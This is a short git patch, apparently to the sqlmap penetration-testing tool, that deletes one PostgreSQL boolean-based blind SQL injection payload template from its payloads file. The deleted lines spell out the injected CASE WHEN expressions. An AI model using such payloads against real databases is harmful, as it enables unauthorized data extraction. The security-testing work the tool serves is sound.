From 5aa958a1466869fbfb8d17c8dfb7813f8a310e40 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 24 Jan 2011 22:51:15 +0000 Subject: [PATCH] ASCII & CHR is quite common, so removing this one --- xml/payloads.xml | 15 --------------- 1 file changed, 15 deletions(-) diff --git a/xml/payloads.xml b/xml/payloads.xml index c57eabe25..6b0a48500 100644 --- a/xml/payloads.xml +++ b/xml/payloads.xml @@ -726,21 +726,6 @@ Formats: - - PostgreSQL boolean-based blind - Parameter replace - 1 - 4 - 1 - 1,2,3 - 3 - ASCII(CHR(CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0 END)) - - ASCII(CHR(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 0 END)) - - - ASCII(CHR(CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 0 END)) - -